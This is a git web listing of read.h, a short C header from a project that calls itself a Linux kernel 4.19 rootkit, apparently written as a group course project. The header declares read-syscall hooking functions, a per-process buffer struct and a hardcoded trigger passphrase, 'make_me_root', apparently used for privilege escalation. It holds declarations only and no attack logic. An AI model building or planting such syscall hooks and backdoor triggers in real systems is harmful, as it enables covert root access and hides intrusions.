linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

read.h (480B)

      1 #ifndef _GROUP7_READ_H
      2 #define _GROUP7_READ_H
      3 
      4 #define PASSPHRASE          "make_me_root"
      5 #define SHIFT_OFF           12
      6 #define MAX_BUF             23 //We never need to save more than 23 Bytes
      7 
      8 
      9 void handle_pid(pid_t, __user char *, size_t);
     10 void hook_read(void);
     11 void unhook_read(void);
     12 
     13 struct pid_entry {
     14     pid_t pid;
     15     char *str;
     16     int capacity;
     17     int iter; //Keep track of where we left off while filling str
     18     struct hlist_node hlist;
     19 };
     20 
     21 
     22 #endif//_GROUP7_READ_H